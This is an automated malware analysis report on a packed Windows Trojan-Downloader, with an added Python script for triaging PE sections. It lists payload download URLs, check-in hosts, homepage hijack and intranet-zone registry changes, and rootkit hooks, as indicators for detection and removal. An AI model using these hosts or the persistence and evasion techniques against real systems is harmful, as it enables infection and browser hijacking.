Detection names: Trojan-Downloader.Win32.Agent.wugyc (Kaspersky), Gen:Variant.Symmi.63061 (B) (Emsisoft), Gen:Variant.Symmi.63061 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 26b96d0c0c5ea406c4f7f669b991fa24
SHA1: b53554669699ffe1819559a822bb39e283e2a16d
SHA256: 30fce0cf5e6a216ab53bab53cff40aa92709e031002a9c770f94d83999e439aa
SSDeep: 12288:c8Y/YzlaWfBBr8shgrIx0ffUSZJ7ZLqppXUhttEwT9JPT7yx7B3b+9QoNEy:dmYzx8shgUxxkdt+wTXTOx75b+9
Size: 850432 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2013-01-24 11:35:14
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. A Trojan that downloads files from the Internet without the user's knowledge and executes them. In this run it downloaded x86.dll and CDClient.dll from www.go890.com (the same /d2/ paths were also requested on opt.ecoma.ourwebpic.com), registered the kernel-mode driver service R65SdhOzV1G, pointed the Internet Explorer start page, local page and the IE icon's Open Home Page command at hao123.com, widened the IE Local intranet zone, looked up its public IP through ip138.com, and POSTed a JSON check-in to cnwb.58ad.cn/index/eventup.html.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:1832
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hTnANms\EArNsVa.dll (13719 bytes)
C:\nwfvJhr.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\style[1].css (1778 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\ip138[1].htm (2562 bytes)
%WinDir%\clog.txt (5020 bytes)
%WinDir%\MpvlIklT.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\jscript_jquery-1.4.2.min[1].js (4954 bytes)
C:\gyVLeno.bat (18 bytes)
C:\JOedQmjW.dll (3481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\desktop.ini (67 bytes)
%System%\74ec9\CDClient_EX.sys (108 bytes)
%WinDir%\hTnANms\HKMKVcec.dat (18 bytes)
C:\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\175sf[1].htm (4199 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
%System%\CDCLOG.txt (87 bytes)
The Trojan deletes the following file(s):
%WinDir%\hTnANms\EArNsVa.dll (0 bytes)
C:\nwfvJhr.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\ip138[1].htm (0 bytes)
%WinDir%\MpvlIklT.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\jscript_jquery-1.4.2.min[1].js (0 bytes)
C:\gyVLeno.bat (0 bytes)
C:\JOedQmjW.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\style[1].css (0 bytes)
%System%\74ec9\CDClient_EX.sys (0 bytes)
%WinDir%\hTnANms\HKMKVcec.dat (0 bytes)
C:\498E9.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\175sf[1].htm (0 bytes)
%System%\CDCLOG.txt (0 bytes)
Registry activity
The process %original file name%.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"ImagePath" = "\DosDevices\%System%\74ec9\CDClient_EX.sys"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE https://www.hao123.com/?tn=90131381_hao_pg"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"ErrorControl" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90131381_hao_pg"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 7A 33 6D D8 F2 22 FB 9C D4 9D 17 00 60 4B 85"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90131381_hao_pg"
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"Devname" = "R65SdhOzV1G"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan changes the Internet Explorer security-zone mapping so that all network paths (UNCs) are treated as part of the Local intranet zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
It also maps all sites that bypass the proxy server to the Local intranet zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
It also maps all local (intranet) sites not listed in other zones to the Local intranet zone; together with the UNCAsIntranet and ProxyBypass changes this widens the set of sites that receive the laxer intranet-zone security settings:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The following kernel-mode driver service (Type = 1, see above) is registered with on-demand start (Start = 3), so it is not started automatically at boot:
[HKLM\System\CurrentControlSet\Services\R65SdhOzV1G]
"Start" = "3"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
a7593f0cb215231cd18877d846efeb59 | c:\JOedQmjW.dll |
9cd1bda903fa3c1447b98a6cc7b5a19d | c:\WINDOWS\hTnANms\EArNsVa.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "\DosDevices\%System%\74ec9\iEwx6T7VPp9.sys" the Trojan monitors process creation and termination by registering a process-creation notify routine (the PsSetCreateProcessNotifyRoutine callback).
Using the same driver it monitors the loading of executable images into memory by registering a load-image notify routine (PsSetLoadImageNotifyRoutine).
Using the same driver it monitors registry operations by registering a registry callback (CmRegisterCallback).
Note that this driver file is not the one named in the ImagePath of the R65SdhOzV1G service (%System%\74ec9\CDClient_EX.sys, 108 bytes); both sit in the same %System%\74ec9\ folder.
The Trojan installs a kernel-mode hook on the following system service; hooking ZwTerminateProcess is a common way for malware to keep its own processes from being killed:
ZwTerminateProcess
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager): no processes were created in this run, so there is nothing to terminate at this step.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\hTnANms\EArNsVa.dll (13719 bytes)
C:\nwfvJhr.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\style[1].css (1778 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\ip138[1].htm (2562 bytes)
%WinDir%\clog.txt (5020 bytes)
%WinDir%\MpvlIklT.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AT9BR1BQ\jscript_jquery-1.4.2.min[1].js (4954 bytes)
C:\gyVLeno.bat (18 bytes)
C:\JOedQmjW.dll (3481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\desktop.ini (67 bytes)
%System%\74ec9\CDClient_EX.sys (108 bytes)
%WinDir%\hTnANms\HKMKVcec.dat (18 bytes)
C:\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0BAV0141\175sf[1].htm (4199 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
%System%\CDCLOG.txt (87 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 286720 | 112128 | 5.54409 | 9fa1ced2e0c24dca8d57485477d272da |
DATA | 290816 | 724992 | 720384 | 5.5448 | aa17a4970f6c4c80efb06e2e9a813f98 |
BSS | 1015808 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 1019904 | 8192 | 2048 | 5.03807 | 508e5b72d32a7f60ba2dc42f1968f594 |
.tls | 1028096 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1032192 | 4096 | 512 | 0.146134 | 1cd25dfa02f8cf7ef11eda7171df941f |
.reloc | 1036288 | 24576 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 1060864 | 20480 | 5120 | 4.80478 | 265b1cc001f314ba9cf6fd5e3a29b90b |
.aspack | 1081344 | 12288 | 9216 | 4.2544 | 88fe2fdbebfd3fad67f8a505549c3c47 |
.adata | 1093632 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
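The section table above is what an analyst reads to confirm the PEID verdict (ASPack): CODE occupies 286720 bytes in memory but only 112128 on disk, the .aspack and .adata sections carry the unpacker stub, and the BSS, .tls, .reloc and .adata rows have no raw data at all. The following is an added example (not Lavasoft MAS code) that automates those checks with the Python standard library only. The thresholds (a 2x virtual/raw gap on sections with at least 4 KiB of raw data, entropy above 7.0 bits per byte) and the constructed sample PE are assumptions for illustration, not values taken from the report. It also rejects input that lacks an MZ signature, which is what the captured CDClient.dll body in the Network Activity section (it begins with "DUP" rather than "MZ") would trigger.

```python
"""PE section triage for a packed sample. Added example, not Lavasoft MAS code:
walks DOS header -> PE signature -> COFF header -> section table, computes the
Shannon entropy of each section's raw bytes and applies simple packer heuristics."""
import math
import struct
from dataclasses import dataclass

# Section names added by common packers; the report's PEID field says ASPack.
PACKER_SECTION_NAMES = {".aspack", ".adata", "UPX0", "UPX1", ".petite", ".nsp0"}
MIN_RAW_FOR_RATIO = 0x1000  # ignore virtual/raw gaps on tiny sections (alignment slack, BSS-like)


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_offset: int
    raw_size: int
    entropy: float


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes) -> list:
    """Return the section table of a PE image; ValueError if the data is not a PE."""
    if image[:2] != b"MZ":
        raise ValueError(f"missing MZ signature, got {image[:4]!r}")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]   # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]      # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, rsize, rptr = struct.unpack_from("<8sIIII", image, table + i * 40)
        raw = image[rptr:rptr + rsize] if rsize else b""
        sections.append(Section(name.rstrip(b"\0").decode("latin-1"),
                                vaddr, vsize, rptr, rsize, shannon_entropy(raw)))
    return sections


def packer_hints(sections) -> list:
    """The heuristics an analyst applies by eye to a section table like the report's."""
    hints = []
    for s in sections:
        if s.name in PACKER_SECTION_NAMES:
            hints.append(f"{s.name}: packer section name")
        if s.raw_size >= MIN_RAW_FOR_RATIO and s.virtual_size > 2 * s.raw_size:
            hints.append(f"{s.name}: virtual size {s.virtual_size} >> raw size {s.raw_size} (unpacked in memory)")
        if s.entropy > 7.0:
            hints.append(f"{s.name}: high entropy {s.entropy:.2f}")
    return hints


def triage(image: bytes) -> dict:
    sections = parse_sections(image)
    return {"sections": [(s.name, round(s.entropy, 2)) for s in sections],
            "hints": packer_hints(sections)}


def build_sample_pe(specs) -> bytes:
    """Build a minimal, non-runnable PE32 from (name, raw_bytes, virtual_size) tuples.
    Constructed test input only: no code, imports or entry point."""
    e_lfanew, opt_size, n = 0x40, 0xE0, len(specs)
    hdr_end = e_lfanew + 4 + 20 + opt_size + 40 * n
    raw_ptr = (hdr_end + 0x1FF) & ~0x1FF                  # 512-byte file alignment
    table, blobs, vaddr = b"", b"", 0x1000
    for name, raw, vsize in specs:
        table += struct.pack("<8sIIII", name.encode().ljust(8, b"\0"), vsize, vaddr,
                             len(raw), raw_ptr + len(blobs) if raw else 0)
        table += struct.pack("<IIHHI", 0, 0, 0, 0, 0x60000020)  # relocs, line numbers, characteristics
        blobs += raw
        vaddr += (vsize + 0xFFF) & ~0xFFF
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)  # i386, n sections
    opt = b"\x0b\x01" + b"\0" * (opt_size - 2)                         # PE32 magic 0x10b
    headers = dos + b"PE\0\0" + coff + opt + table
    return headers + b"\0" * (raw_ptr - len(headers)) + blobs


# Constructed sample shaped like the report's table: small-on-disk / large-in-memory
# CODE, an alignment-padded .rdata, and an ASPack unpacker stub section.
SAMPLE_PE = build_sample_pe([
    ("CODE", bytes(range(256)) * 16, 286720),
    (".rdata", b"\0" * 512, 4096),
    (".aspack", bytes(range(256)) * 2, 12288),
])

if __name__ == "__main__":
    for hint in triage(SAMPLE_PE)["hints"]:
        print(hint)
    try:
        parse_sections(b"DUP\0" + b"\0" * 60)   # shape of the captured CDClient.dll body
    except ValueError as exc:
        print("not loadable as a PE:", exc)
```

To run it on the real sample, pass open(path, "rb").read() to triage(). Note that the CODE and DATA entropies in the report are about 5.5, below the 7.0 threshold used here, so on this sample the section-name and size-ratio heuristics carry the verdict rather than entropy.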
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.58sky.com/index/getcfg?id=1 | 119.97.143.41 |
hxxp://opt.ecoma.ourwebpic.com/d2/CDClient.dll | |
hxxp://opt.ecoma.ourwebpic.com/ | |
hxxp://opt.ecoma.ourwebpic.com/d2/x86.dll | |
hxxp://cdn.sp.cdntip.com/ic.asp | |
hxxp://175.haodns123.cc/ | |
hxxp://175.haodns123.cc/css/style.css | |
hxxp://175.haodns123.cc/js/jscript_jquery-1.4.2.min.js | |
hxxp://opt.ecoma.ourwebpic.com/ips1388.asp | |
hxxp://www.58sky.com/index/eventup.html | 119.97.143.41 |
hxxp://so.qh-lb.com/ | |
hxxp://www.haosou.com/ | 125.88.193.243 |
hxxp://www.175sf.com/js/jscript_jquery-1.4.2.min.js | 183.60.200.84 |
hxxp://www.ip138.com/ | 87.245.198.83 |
hxxp://www.go890.com/d2/CDClient.dll | 87.245.198.83 |
hxxp://www.ip138.com/ips1388.asp | 87.245.198.83 |
hxxp://cnwb.58ad.cn/index/eventup.html | 119.97.143.22 |
hxxp://www.go890.com/d2/x86.dll | 87.245.198.83 |
hxxp://www.175sf.com/ | 183.60.200.84 |
hxxp://1212.ip138.com/ic.asp | 42.236.95.18 |
hxxp://www.175sf.com/css/style.css | 183.60.200.84 |
www.so.com | 106.120.160.134 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /css/style.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 17:46:34 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Thu, 23 Jun 2016 10:01:38 GMT
Content-Encoding: gzip
b2a...............n......?..,.....(KZ.....Q.2.J...A...5%...^;.c..T....~@..gZ.y./....sf..(.:....`9.s.s...~.G....7...f.g.x52.g..,]..M|....^. ...]...x^..F.<...o.?Z.... {f.2NnG...}......'.....#.,:.../G.'&...;9.z.9:>._.LN..#c..".:^...-H.0.:y..l..$.W..,./r.\..y.TL&.L.G..-..QF.O.$.(..$.h.f~...8.W..$f....|".8).5.....t...q~..}...Vg..uR:62.....4.w%._B...T...k?....}.....K.M.../.9....o............[........m..jI...a.(..8...n,.To...|F.....(.....I.. ....q&._L..l".'..j. .L-"..2k..sW8@:i.#..W.,-T...:K>.v?'_...}.K.y.}....b..>..Ig`.o........q5........r.w........1;@f}...].0....95...V..`..Q...3.......yH.'.c.NNN.%.t..U....{tK.h:"..1.,..c"`o.EA...r.x..z..1...=U....i%:.p.3..3.1.9..n_.......w.?.n....V... 4....FZ....*Q......r...].g.$.2QZm......g..0.2..k ..s nn.$...S..[..f. ...fi^.T...B..(.$T.3\^ R..wq.....llE}..P..e.W...%._..D...cc.$...R... ..fd,.0.V.......#..w.&.z.`..G] . C.....{.`...G..9....p...r.x.h..N(....:..f.\...@.7..).D..F`#.........f.p....2L.Z.......J.......M.`[...2ZE7.e.d.v..r.. .... .....djV..rZ...=.......d........o?....~...Q..h.......C".=v.o.K...0.~.C(.L...B.......>Z..y'......Q..I.....=Y.J....(^....Uu'...02....\S!..C...Z.... S.~.=\....z.....A.n......S..H.u).L.k.P...<Hb.Y....|u..N..8.....0.\'n......oC`...(....H.l..s....q.[7.`...1t....4.....X.us..~.1...Z.....e...-^t.;.d....3...}F.6......., SPu.V.....e......@...8.r..es.z...*m....5.*.2...h........R.%.^.Zc....4;.=.\.AS..OE..J.;.}.,..YE$.;k.........@]G.i..Ptq...;M...#V.AS.......>;.....-b;....YDH.W.#".@/.w.A......8.a..zH....,(.. `{..E.9...(."...v..F.xW...r...^..
<<< skipped >>>
GET /js/jscript_jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 17:46:35 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 02:14:30 GMT
Content-Encoding: gzip
607f.................F.(._...XhO...H...g.(.Wk[=..v...(_..Ip..$k..y...>..._,..L.,.{....$r...2"...................o.-....E.\7...".........i.^/.v{r.y[.|..d..2_...h.n<..wD.o.x..)]e#..j....l..Vi..,..h..i......h........*....*..U.h^....n..b0.$..q.}.4K[..YpE.....A_?@G^....&..Ek....)...A.E... ....u.{..<.h....h.x....o.O...|.....\....N.3Bg..f1..........<r.m6tO..l.S.%..v].oW.$.l..b.z.....r...........h=....]....<.7kw..s/(...X.... t..^.....D.m....t..h....M1.)ED.....F.U*`......wV.(......,.....h...uz.....e.XCG.5[,.............2*...y....o..y~...g.......a7E"."..o{...,.Z.t1Z....5t,.6.0..<......0/\..7.E#...\...O.$jf...jHN..."<....OOq...U..XY.v.."..f.K..k...........B}.<?............`......`.9..Ho.....W.5&.w..A S~..........O..M....V....Z.....@.vQ.\..].\..#.,.KH.{0....(F.. 1...}*....p.Bhq..l%..}.......e7...H.X,....d..>.vQ ......4.....`.O......l.}..\..B..vx...X.....)..6.7.i?...d#.f...,.B...&4.mv...f5v...p.`....i..T......~..`0k..t...........5......S...`................t.Nz........6.. ...a...fX"k-.....y.Y....pv../..nR...`.t.@.|...h....q...a..^.......`.z.O.l....zR..v.&...2]..G........ ]'..i.......[!....).2m..z......{.?c.?.%~.O....t#.M.....FM....;.X.R.......8^.......S..U........@d.B...f\...p..e... n..&;n....M^...F..~..X. ...C..:..:.j...f....7...6.0..8d.......N.... ._..>P(x.(x....^{....O.$..D`z/.._j.`io..J.3.4R. .c.&..]...o....T..... ..".8....p :.=.Z..b...@......O.f..:==Y...M....Sw.Zm...X...t0}9...v'.3.Ln...q2.*....F.9{...a2..9....v....5..\.j.od)....=.hA.0Dd..R...p......o.G.(..'i..R?5...Lp...0<......b......
<<< skipped >>>
GET /ips1388.asp HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
HTTP/1.1 200 OK
Date: Fri, 02 Sep 2016 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9659
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQRSQRR=CNIHBEKENOHNABNJLBGEEHLA; path=/
Cache-Control: private
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML>..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<meta http-equiv="mobile-agent" content="format=html5; url=hXXp://m.ip138.com/ip.html"/>..<TITLE>IP........--.................. | ............ | ............ | ........................</TITLE>..<META NAME="Generator" CONTENT="ip,IP....,IP........,ip138,........">..<META NAME="Author" CONTENT="ip138,........">..<META NAME="Keywords" CONTENT="ip,IP....,IP........,ip138,........">..<META NAME="Description" CONTENT="ip,IP....,IP........,ip138,........">..<SCRIPT LANGUAGE="JavaScript">..<!--..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip.value;...if (ip.indexOf(" ")>=0){....ip = ip.replace(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXp://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(
<<< skipped >>>
GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
